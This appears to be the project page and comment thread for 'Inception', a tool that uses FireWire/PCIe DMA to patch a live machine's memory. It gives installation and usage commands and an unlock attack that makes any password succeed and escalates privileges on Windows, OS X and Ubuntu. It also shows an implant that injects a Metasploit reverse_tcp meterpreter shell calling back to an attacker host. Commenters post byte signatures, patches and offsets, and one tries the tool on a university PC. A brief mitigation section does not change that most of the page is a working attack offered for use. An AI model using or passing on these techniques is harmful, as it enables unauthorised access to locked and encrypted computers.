Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.

Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.

How it works

Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.

Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.

After running that module you should be able to log into the victim machine using any password.

An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.

Awesome! But why?

The world’s forensics experts, governments and three-letter acronym agencies are using similar tools already, so why not? Inception is free, as in beer. A professional equivalent tool will set you back ~10 000 USD. Hack back!

Key data

The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

Requirements

Inception requires:

  • Hardware:
    • Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
    • Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
  • Software:
    • Python 3
    • git
    • gcc (incl. g++)
    • cmake
    • pip (for automatic resolution of dependencies)
    • libforensic1394
    • msgpack

Installation

On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install

Download and install Inception

git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

The setup script should be able to install dependencies if you have pip installed.

General usage

  1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
  2. Run Inception

Simply type:

incept [module name]

For a more complete and up-to-date description, please run:

incept -h

or see the tool home page.

Modules

As of version 0.4.0, Inception has been modularized. The current modules, and their functionality is described below.

For detailed options on usage, run:

incept [module name] -h

Note: Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D effectively blocking DMA requests and thwarting almost all modules. Look for vtd[0] fault entries in your log/console.

Unlock

The unlock module can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. module is primarily attended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn’t pack encryption.

The unlock module is stable on machines that has 4 GiB of main memory or less. If your the target has more then that, you need to be lucky in order to find the signatures mapped to a physical memory page frame that the tool can reach.

As of this version, it is able to unlock the following x86 and x64 operating systems:

OS Version Unlock lock screen Escalate privileges
Windows 8 8.1 Yes Yes
Windows 8 8.0 Yes Yes
Windows 7 SP1 Yes Yes
Windows 7 SP0 Yes Yes
Windows Vista SP2 Yes Yes
Windows Vista SP1 Yes Yes
Windows Vista SP0 Yes Yes
Windows XP SP3 Yes Yes
Windows XP SP2 Yes Yes
Windows XP SP1
Windows XP SP0
Mac OS X Mavericks Yes (1) Yes (1)
Mac OS X Mountain Lion Yes (2) Yes (2)
Mac OS X Lion Yes (2) Yes (2)
Mac OS X Snow Leopard Yes Yes
Mac OS X Leopard
Ubuntu (3) Saucy Yes Yes
Ubuntu Raring Yes Yes
Ubuntu Quantal Yes Yes
Ubuntu Precise Yes Yes
Ubuntu Oneiric Yes Yes
Ubuntu Natty Yes Yes
Linux Mint 13 Yes Yes
Linux Mint 12 Yes Yes
Linux Mint 12 Yes Yes

(1): Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D effectively blocking DMA requests and thwarting this attack. Look for vtd[0] fault entries in your log/console. (2): If FileVault 2 is enabled, the tool will only work when the operating system is unlocked as of OS X Lion. (2): Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures.

The module also effectively enables escalation of privileges, for instance via the runas or sudo -scommands, respectively.

Execution

To unlock, simply type:

incept unlock

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[*] Available targets (known signatures):

[1] Windows 8 MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7 MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu libpam unlock/privilege escalation
[7] Linux Mint libpam unlock/privilege escalation

[?] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation
[=============>                                                ]  227 MiB ( 22%)
[*] Signature found at 0xe373312 in page no. 58227
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

Implant

The implant module implants a (potentially memory-only) Metasploit payload directly to the volatile memory of the target machine. It integrates with MSF through the msfrpcd daemon that is included in all versions of Metasploit.

The current version only work as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future. If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request.

Execution

To use it, start msfrpcd:

msfrpcd -P [password]

Then launch inception:

incept implant --msfpw [password] --msfopts [options]

As an example, to create a reverse TCP meterpreter shell from the target machine to your attacking host, first start the msfrpcd dameon, and then launch a console listening for callbacks.

msfrpcd -P password
msfconsole

In the console, we configure the receiving end of the payload. We’re setting the EXITFUNC option tothread to ensure that the target process stays alive if something should go awry:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.1
set EXITFUNC thread
set ExitOnSession false
exploit -j

Then, in another terminal, we launch Inception:

incept implant --msfpw password --msfopts LHOST=172.16.1.1

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future. If you want to
    change this, send me a wad of cash in unmarked dollar bills or a pull
    request on github.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  537 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  434 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

In your MSF console, you should see something similar to this:

msf exploit(handler) > [*] Sending stage (769536 bytes) to 172.16.78.200
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 172.16.78.200:49178) at 2014-08-30 16:23:31 +0200

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-11FMQRBAMJ6  172.16.1.1:4444 -> 172.16.78.200:49178 (172.16.78.200)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Troubleshooting

Not working you say? Here’s a couple of hints:

  • First, use the -v switch to visually confirm that the tool is able to read memory from the victim.
  • Make sure you actually are connected with a IEEE134 FireWire cable (FireWire to USB converters, etc. won’t work, but 4/6/9 pin FireWire adapters do). Doh.
  • “Nofirewire devices detected on the bus”
    • First, try running the tool again.
    • If you get this error message, try a different cable and/or using a couple of converters  (such as this and this) to convert from 6/9 pin FireWire connector to 4 pin and back again. 6/9 pin FireWire cables are capable of transferring power, and this may cause trouble for some FireWire chipsets. Some FireWire cables are also known to be “straight-through” (i.e., not “crossover”), an this is known to cause trouble.
    • Are you attacking from an OS that doesn’t support hot-plugging (such as BackTrack) using a ExpressCard/etc. on the host side? Re-boot the machine with the expansion card plugged in before running Inception.
  • Are you sure you’re getting DMA? Sometimes the target machine uses an extended period of time (I’ve experienced time-spans up to around 30 secs on slow targets) installing the FireWire drivers and lowering the DMA shield; it is possible that you just didn’t wait long enough before attacking. Use the delay switch to increase the delay, and -v/–verbose to see if you actually read data. Also, looking in the Device Manager (assuming you are setting up a demo attacking Windows) may be helpful to see that a FireWire SBP2 device actually pops up when running the tool. Mind you, it is all right with a yellow exclamation mark by the device, the tool should work nevertheless.
  • Does your target use some form of endpoint protection? Some antivirus vendors specifically block FireWire DMA. Turn it off and see what happens.
  • Does your FireWire port work? Try connecting a FireWire disk and see if it is recognized. Check your BIOS setting to see that it is not disabled. Ensure that FireWire drivers are present and not removed from the system.
  • Are you getting data, but still can’t find the signature? Check the above and see the FAQ below. Also check the amount of RAM installed (FireWire max addressable memory space is 4 GiB). The code may lie above that threshold, in which case the unlock attack won’t work. This is especially true for Linux machines, where kernel code resides in high memory addresses.
  • Did Inception patch successfully, but you cannot log in? Try a non-blank password. Some OS authentication mechanisms check for blank passwords before passing control to the mechanism that Inception patches.
  • Try again. Sometimes the DMA shield fails to lower on the first try/tries.

Known bugs

  • Due to severe bugs in the Mac OS X FireWire stack IOKit, attacking from a Mac can cause a kernel panic at the target and/or host system if an error condition should occur. As of March 2012, attacking from Mac OS X is not recommended.

*) Caveats

  • Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool look for may be loaded at a memory address > 0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, search for encryption keys.
  • You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that doesn’t map to hardware RAM.
  • OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for  versions before 10.7.2, where the vulnerability is patched.
  • If you have a OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.

Attack mitigation

To stay safe and protect against FireWire DMA attacks, here’s a couple of suggestions:

Windows

OS X

  • Don’t panic – if you are using FileVault2 and OS X Lion (10.7.2) and higher, the OS will automatically turn off DMA when locked – you’re still vulnerable to attacks when unlocked, though
  • Set a firmware password

Linux

All of the above will impact FireWire in one way or the other. Unfortunately, this is a FireWire design problem, not an OS problem, and would have to be fixed in the SBP-2 protocol itself.

History

Inception was originally coded as a GPL replacement for winlockpwn, the Windows FireWire unlock tool made available by Adam Bolieu aka Metlstorm. winlockpwn was quite stable against older Windows XP targets, but did not perform well against more modern operating system like Windows 7 (and it is not maintained anymore). As of Linux kernel 2.6.22 Linux Distros ships with the new ‘Juju’ FireWire stack, making winlockpwn obsolete. Alas, Inception was born.

DMA attacks has been known for many years, so this is nothing new (except for the fact that I will reverse engineer new signatures and update the tool’s functionality until the problem is fixed). However, vendors generally dismiss DMA attacks as a non-issue, which I hope that the awareness that this tool generates will change. Users deserve secure devices, even when attackers gain physical access.

FAQ

  1. Q: This tool is irrelevant, I can just boot the machine with [insert live CD OS here], dump the SAM and SECURITY hives and crack the passwords.
    A: No, you can’t if the target is a full disk encrypted machine. See above. This tool is designed to unlock powered on machines that utilize secure, full disk encryption. It is also far stealthier than the above attack.
  2. Q: Can’t I just use the screen_unlock.rb Metasploit script?
    A: Well you can, assuming that you already have a shell at the target machine. If you have that, you probably won’t need this tool.
  3. Q: I use full disk encryption. Your tool is moot.
    A: No, you’re missing the point: The tool is intended to be used against full disk encrypted machines. Se FAQ 1.
  4. Q: This is FUD! I would never let anyone plug anything into my machine! I’m never more than an arm’s length from my computer. In fact, my machine is the only object I have a non-platonic relationship with, and I would never let my eyes off her. No one would go to the trouble of hacking a single machine anyway.
    A: Good for you. The attack is dependent on physical access to a box in a powered on or standby state, so likely you’ll not be hacked. However, there are organizations out there that would go to utmost lengths to be able to access machines in seconds without leaving a trace. If you are not a target of these organizations, you’re likely never going to be hacked this way. However, if it is your job to be paranoid, you should know about this attack and make an informed decision to protect yourself.
  5. Q: I’ve just glued/desoldered all my Firewire ports. Your move, mhuddafuckah.
    A: Ahem. See the answer to FAQ 7.
  6. Q: Wasn’t this fixed years ago? I remember hearing about this in the olden days (2004).
    A: Sadly, no. And yes, the problem is old, but it is not entirely fixable with a driver update, a patch or a new OS version. The problem is in the Firewire specs. All OS vendors that want to include Firewire drivers that are OHCI compliant and works out of the box with SBP-2 devices are vulnerable in some degree.
  7. Q: Isn’t FireWire a dying horse? Few laptops ship with FireWire ports these days, which makes Inception a useless tool.
    A: You can use any interface that expands the PCIe bus, for example PCMCIA, ExpressCards, the new Thunderbolt interface and perhaps SD/IO to hotplug a FireWire interface into the victim machine. The OS will install the necessary drivers on the fly, even when the machine is locked.
  8. Q: Your tool isn’t working.
    A: That’s not a question. Check the troubleshooting section above first, and when you have made sure that the error source isn’t between the chair and the keyboard, preferably open an issue at github describing the problem, including:
    • Your host OS
    • The target OS (For Windows, the output of running winver.exe on the machine, format: major.minor.build, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
    • The target CPU architecture (x86/x64, etc.)
    • Output of the tool
    • Memory size of target

License / donate

The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

If you like tool, and especially if you use it successfully in a digital investigation, please consider making a donation to me:

My Bitcoin address

1ENpY2UTa8fB3nZpc1imZz1vj8zKHcNsxb

245 Responses to “Inception”

  1. killerbiz

    Hi,
    Thks for this great tool !
    Does it work with smartcard logon? (user/passwd desactivated)
    If not it could be great to implement it.
    Best regards,
    Killerbiz

    Reply
    • Carsten

      Maybe. The smart card reader would have to communicate with the OS in some way, and that communication would necessarily result in pages being loaded into memory and executed. If the smart card reader needs it’s own authentication modules loaded, I could probably need to reverse engineer the driver to understand how to eliminate the checks that verifies your smart card. Unfortunately, I’m not currently in possession of a smart card reader.

      If you have a reader available, try it out. The existing patching of msv1_0.dll may very well work against smart card authentication as well.

      Reply
      • killerbiz

        Hi,
        Thks for the fast answer.
        I’ll test it against smart card soon and will keep you aware of the result.
        Ciao

        ps: great results on the standard log/pass authent !

        Reply
  2. tekkenhead

    I had the same problem with windows xp sp2 so I changed the offset and signature to this:

    signature=0x83F8107513B0018B
    pageoffset=0×946
    patch=0x83F8109090B0018B

    I haven’t tried it out. But is should NOP the jump function as in the other OS’s listed. I also had to change the vista pageoffset to suit my needs as well to get it to work for me.

    Reply
    • Carsten

      Thanks, I’ll check it out. The vista signature is quite old, so I’m not surprised it has changed. Do you have it available?

      Reply
  3. tekkenhead

    I wanted to say its a great program. So is winlockpwn I got it to work for windows xp after tweaking the signature offsets and it was a great way to learn about IDA.

    I was wondering if in the next version of ftwautopwn if there could be a way of trying older or multiple pageoffsets instead of manualng updating the config.cfg file. If I am not mistaken I think you can only apply multiple patches to the same file now.

    Thanks

    Reply
    • Carsten

      Thanks. That is exactly what I’m working on: improving signature robustness and parallel search at multiple offsets. Stand by for a new release sometime during the next few weeks.

      Reply
  4. tekkenhead

    Here is the pageoffset I used for Vista Ultimate with SP1.
    pageoffset=0x80F

    I also wanted to let you know I used a 4 pin cable with a 6 pin male adapter and it worked great.

    Reply
  5. jan

    I am having trouble getting this to work. The SBP2 device shows up in the device manager of the target machine, as well as a disk drive (UNKNOWN VENDOR AND MODEL) with a yellow question mark on it. It says ‘cannot start’. the error I get is:

    Please select target (or enter ‘q’ to quit): 6
    [+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    Phase 1:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x8aa (2218)
    Phase 2:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0×862 (2146)
    Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
    File “./ftwautopwn.py”, line 80, in
    main(sys.argv[1:])
    File “./ftwautopwn.py”, line 76, in main
    unlock.run(ctx)
    File “/home/jan/FTWAutopwn/ftwautopwn/unlock.py”, line 129, in run
    d = initialize_fw(d)
    File “/home/jan/FTWAutopwn/ftwautopwn/unlock.py”, line 254, in initialize_fw
    d = b.devices()[0]
    IndexError: list index out of range

    any ideas?

    Reply
    • jan

      Just a little more info. I booted the target system (thinkpad r500) into ubuntu 9.04 to see if windows was the issue. I get the same error. I did increase the delay time on both systems with no positive result. I took the source computer (thinkpad r500 also) and plugged it into my desktop system. There the ftwautopwn ran but resulted in the same as a previous poster along the lines of

      [+] Searching for signature, 379 MiB so far.
      [-] Looks like we’re not getting any data. We could be outside memory
      boundaries, or simply not have DMA. Try using -v/–verbose to debug.

      so the ftwautopwn can connect to the desktop just fine, but not the laptops (I also tried xp sp3 on a thinkpad r400 as target but can’t connect to it either)

      The target xp laptop can connect to my xp desktop and do filesharing via firewire with no problem, so I know the hardware on all computers is ok.

      I am out of ideas.

      Reply
      • Carsten

        Hi Jan, unfortunately it is hard for me to debug this remotely. If you are able to use the tool against one machine, but not another, and booting into another OS at the target doesn’t help, it is likely a hardware problem. You could try to create another FireWire port by plugging in an ExpressCard etc. to se if that resolves the issue.

        Reply
        • jan

          Ordered a new cable and firewire cards to plug into laptop. Will let you know how it goes. Thanks for the reply

          Reply
          • jan

            FYI,
            I got 2 pc card firewir adapters to shove into the laptops. and the program then executes.

            However, I still get no result. what I see is along the lines reported by a previous poster:
            Continue? [Y/n]: y
            [+] Searching for signature, 379 MiB so far.
            [-] Looks like we’re not getting any data. We could be outside memory
            boundaries, or simply not have DMA. Try using -v/–verbose to debug.

            I see it scanning through changing data values, but never finds a match. I tried 3 different computers of XP with SP3 in 2 different languages (eng, and german). No luck. I disassembled the dll file with IDA Pro and the offsets and everything looks ok.

            No clue what is happening, but my chance to demonstrate the party trick has come and gone….

          • Carsten

            That’s weird. Sounds like you are not getting DMA. Maybe you could try to dump the entire memory using the tool volatility and inspect the result? Language should have nothing to do with this.

            Edit: I’ve never had any problems like this using the tool – at least not against Windows XP. The signatures are very stable, and as you say, you were able to dissassemble the msv1_0.dll file yourself to confirm them. What kind of hardware are you using on the attacking side?

  6. jan

    Using a thinkpad R500 on the attacking side. I bought 2 types of firewire card, one express card and one pcmcia card, since the laptops have both types of slots. I tried all combinations of configurations but none work. however, the type of card I have in the slot determines the data I get when we are out of memory range. For example, when it reads in the region about 3GB where there is no memory I either see all fffffff or 000000 depending on the card. Where there is memory, I see rapidly changing memory contents, so I think I have access to at least some memory.

    I am going to dig up my old emachines laptop and put the pcmcia card in it to see what is up.

    can you tell me how to do a memory dump using volatility?

    Reply
  7. marc

    on a windows 7 sp1 32bit:

    the memory location is found and the location patched.
    when I enter a random password, I get an error “RPC service unavailable” and can not login, also not with the correct password. There is no difference if the user is local or a domain user and if there is network connectivity or not.

    any idea how to get this working in such a case?

    Reply
    • Carsten

      Sounds like a false positive (ie. that there are more than one match in-memory). Do you get this error consistently? I’m working on creating more stable signatures for Win7, both 32 and 64 bit, unfortunately the progress is a bit slow…

      Reply
      • marc

        Hi Carsten,

        well I tried 3 times with the same result (rebooting, and working with the account for some time), so I’d say its consistently.

        Reply
        • Carsten

          Hi Mark sorry for the late reply. As you may see from this page, I’ve been busy coding and renaming the tool. Could you test the new tool against your Win7 box (as described above)?

          The new matching algorithm will hopefully solve your problems.

          Reply
  8. ncfa

    hi Carsten
    it is really great tool. thank you for that.
    the tool was working for 32 bit systems but when i tried it on a machine that has 64 bit Windows 7, it didn’t work. i checked the signature and offset value of my system, all is ok. but not working. is there a critical point that migth be useful for 64 bit operating systems?

    And also i tried to find signature for Linux and Mac systems. but i couldn’t find any useful info. how can i find the signature and offset values for Linux and Mac operating systems?

    Reply
    • Beka

      Hi Carsten,
      I did some tests and with the same results as ncfa, Windows 7 32 bits works great but none of the 64 bits workstations seems to work.

      Reply
      • Carsten

        Hi, thanks for alerting me. On both my 64-bit Win7 machines, inception is working great. Can you open a ticket at github with:

        - Your host OS
        - The target:
        – OS (For Windows, the output of running winver.exe on the machine, format: major.minor.build, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
        – Amount of physical memory (RAM)
        - The target CPU architecture (x86/x64, etc.)
        - Output of the tool

        Reply
  9. tekkenhead

    Can you give me more info on how to use -f switch in ftwautopwn.py. I have some virtualbox images and would like test. I also have vmware if I need that too. Thanks.

    Reply
    • Carsten

      Unfortunately, Virtualbox doesn’t store the memory from snapshots in binary data files like VMware, but rather use a compressed (?) format. FTWA does currently not support this format. You can use the -f switch to search through VMware memory (.vmem) files located in your vm folder.

      If you venture into dissecting the virtualbox format, drop me a note.

      Reply
      • tekkenhead

        Thanks for the info, but I decided not to redo my images in vmware or try and convert them right now.

        I have recently tried your ftwa.py version and it works great. But there is a problem I ran in too. I got a keyboardinput error with a patchoffset error when running it against a windows xp machine. I looked at your code and you didn’t have a ‘patchoffset’: 0×00′ in the settings.py under the windows xp settings. I changed that and the program worked fine. I only mention that if someone runs into the same error.

        I also deleted the 5 lines that that dealt with offset 0×927 and added offset 0x9B6 instead under the other offsets. I recently upgraded a old windows xp sp2 to sp3 and found a new offset as well. Here are my signatures for xp: offsets’: [0x0126, 0x8aa, 0x862, 0x946, 0x09B6]. I know xp is old but trying to be through.

        I tried your program under windows 7×86 and everything works great and same can be said under windows7x64 including sp1 but I didn’t have any antivirus running and it was a fresh install, but completely updated. If you can also add signature offset 0x80F for vista that would be cool. I am currently working on vista trying to find all signatures. Thanks again.

        Reply
  10. Alex Cheng

    Hi, I’d just checked my laptops and they have a 4 pin female firewire port if I’m not wrong. So to connect from a laptop to another laptop one will need a 4 pin to 4 pin firewire cable?

    Thanks in advance.

    Reply
  11. Alex Cheng

    One slight problem, I cannot login to active directory after reboot. i’m Not connected to LAN, at home now. not sure why. Have to get back to IT next Monday to see if it can be fixed =/

    Reply
    • sbenting

      I ran across this, as well. For a domain account, it appears to leave something behind even after a reboot until you reconnect to the network and log in with the correct password again. Once it reauthenticates against the domain controller, all should work fine.

      Reply
      • Carsten

        I guess this is Windows cached credentials playing a trick on the AD authentication. I’ll have a look and see if it is possible to patch so that the erroneous password is not cached.

        Reply
      • SS

        Found something interesting here:
        https://astr0baby.wordpress.com/2011/09/20/unlocking-windows-7-sp1-locked-screen-remotely/
        “Remember that once the memory is patched and the the user who locked the screen is part of a domain you need to immediately revert the patching by issuing the ” screen_unlock -r” command after you log into Win7 with ANY password, or the domain account will be locked after a while.”
        I can confirm that the statement above is true, because after patching a Win7 x64 Enterprise laptop (part of domain) with Inception I was able to log in with a random password a few times to test, but after a while (perhaps a few hours) the domain account got locked.

        Reply
  12. tekkenhead

    Wanted to say thanks for the credit on the readme. Been pretty busy as of late to work on this right now. But wanted to say I love the new name!

    Reply
  13. Will

    Wow, great tool! I finally got an Ubuntu LiveUSB working on my Mac (the EFI makes it really hard), and I was able to try it out. The memory dump worked great! I was surprised at the amount of human-readable text in the first few megs of RAM from a dump of a Mac. Quite a few funny random things strewn about in there!

    However, I was unfortunately unable to use this software to actually extract a password or disable the unlock screen. Is there anything that I can do to help make a signature that works with OS X 10.7/10.8?

    Also, it would be great if the tool was capable of either writing to a custom file location or even Stdout. When using a LiveCD with no persistence, RAM dumps are very space-expensive, so being able to write to an external device or a FIFO or something can be useful.

    Reply
    • Carsten

      The signatures for OS X for unlocking are outdated, I’m working on “reversing” new ones (slowly, I don’t have much spare time after working 60-80 hrs / wk). If you’d like to help, this is where you could contribute. You could also fork my project on github, make improvements and issue a pull request for inclusion in Inception.

      Memory dumping and extraction of passwords should work though, I’ve tested that myself on Lion.

      Good suggestions regarding output file – I’ll implement that in the next minor version.

      Reply
  14. Skrotor

    Hi! Great tool.

    I tried the tool against a Ubuntu 11.10 and got a successful result. However, when I try to unlock the screen goes black and throws me back to the locked screen. Something obviously happened since im no longer getting “invalid password” but Im still not able to access the system.

    Ideas?

    Regards Skrotor

    Reply
    • Carsten

      Hmm. Let me try that on my own machine, it may be that the tool finds a false positive and that I will need to expand the signatures to make them more accurate. Can you post the output of the following commands here?

      uname -a
      cat /etc/lsb-release

      Reply
      • Skrotor

        Sure can!

        luit@luit-HP-Compaq-nc8230-DX443AV:~$ uname -a
        Linux luit-HP-Compaq-nc8230-DX443AV 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
        luit@luit-HP-Compaq-nc8230-DX443AV:~$ cat /etc/lsb-release
        DISTRIB_ID=Ubuntu
        DISTRIB_RELEASE=11.10
        DISTRIB_CODENAME=oneiric
        DISTRIB_DESCRIPTION=”Ubuntu 11.10″

        Reply
          • Carsten

            I was unable to reproduce with the Ubuntu copy I had back home, but I’m doing a re-install to verify. If you want, you could try running the tool several times (if it finds several signatures, we know the culprit is a false positive)

          • Skrotor

            Ok, here is the output.

            First run:

            [*] Signature found at 0x3d7c6de0 (@page # 251846)
            [*] Data written: 0x0x31db
            [*] Data read: 0x0x31db
            [*] Write-back verified; patching successful

            The second run didn’t give any output after completing.

          • Carsten

            Aha – you’re using an old version of the tool – that offset is from the experimental signatures that were replaced some time ago. Do a git pull and try again.

            Let me know if that doesn’t solve your problems. A word of advice if you are attacking in the field: Ubuntu loads its kernel at high physical memory addresses. Depending on the physical memory size and layout of the target (if the machine has a dedicated graphics card, etc.) you may experience inability to read memory content over the 2/4 GiB mark. If the kernel is loaded above this mark, the unlock won’t work. Memory dumping will still work fine, though.

            Lycka till ;-)

          • Skrotor

            Strange, i hit the same signature even after a git pull, thoughts?

            Tack :P

  15. Tom

    Hi,

    Tried your program at home and it worked perfectly. Then took it to uni to try out. However it says that it worked but when I try to log on to the PC, it says incorrect password.

    The target pc is running XP and the attacker is running latest ubuntu.

    Could it be because my account at uni is a network one?

    Cheers,

    Tom

    Reply
    • Carsten

      Correct. As your university PC probably authenticates against a central domain controller, the trick of allowing local blank passwords won’t work (you don’t have control over the DC password checking functionality). I’m currently considering migrating the Windows signatures to patch the local function that decides if accounts needs to authenticate at all, which would probably fix domain logons as well. This is a future improvement, and not implemented at the moment.

      Depending on the state of the domain PC you are trying to hack, you may be able to log in locally (i.e., “Log into computer XXXX”) instead of logging into the domain. You could also try to disconnect the PC from the network before trying to log in.

      Also, depending on the legislation where you live, hacking your university’s property may be punishable by law. I would suggest testing this in a simulated environment rather than having a go at public computers, unless of course you have permission to do so.

      Reply
      • Tom

        Cheers for the reply,

        I’m trying to use it in a demo I have on wednesday, should be really good.

        No problem, I’ll give them things a try tomorrow and if it still doesn’t work I’ll take in my desktop haha

        Thanks again,

        Tom

        Reply
  16. tekkenhead

    I just ran your new version and I have to say WOW. It is alot faster then the previous versions. Nice.

    Reply
  17. Goldfish

    Is there a download available for the Ubuntu live CD complete with this software?

    Reply
    • Carsten

      If you follow the instructions above, you’ll be able to install on a Ubuntu live cd.

      I have no plans to distribute .deb packages.

      Reply
      • goldfish

        Hi Carsten,
        I followed all instructions exactly. This is the setup:
        Ubuntu 11.04 i686
        python3 inception-0.13 libforensic1394-0.2
        no errors during buid.

        ls /dev | grep fw results in fw0
        sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 removes the fw0 port.

        If I fire incept then I get the error “No firewire devices detected on the bus”.

        lsmod gives firewire_ohci as drivers, not the libforensic drivers.
        sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 removes the fw0 port. Incept places the same drivers back (firewire_uhci).
        What am I doing wrong?

        Reply
        • Carsten

          What type of system are you attacking? Is it connected when running inception? Have you tried attacking other systems?

          Reply
          • goldfish

            It is a Dell E4300, connecting to another laptop (Win7) does not make a difference. Is there a test mode to perform the steps that you do with Winlockpwn?

          • Carsten

            You must be connected to the other machine when running inception. The other machine’s FireWire device must work. Does a FireWire device pop up in device manager on the target?

            I don’t understand what you mean by ‘test mode’. You can use ‘-f’ to attack virtual machines, if that is what you’re aiming at.

        • Carsten

          I don’t understand why you are removing the FireWire modules. libforensic is a library, not a module. Suggest you reboot your system and try to run inception again – it will load the correct modules automatically.

          Reply
          • goldfish

            Ah, I understood libforensics were replacement drivers. My bad.
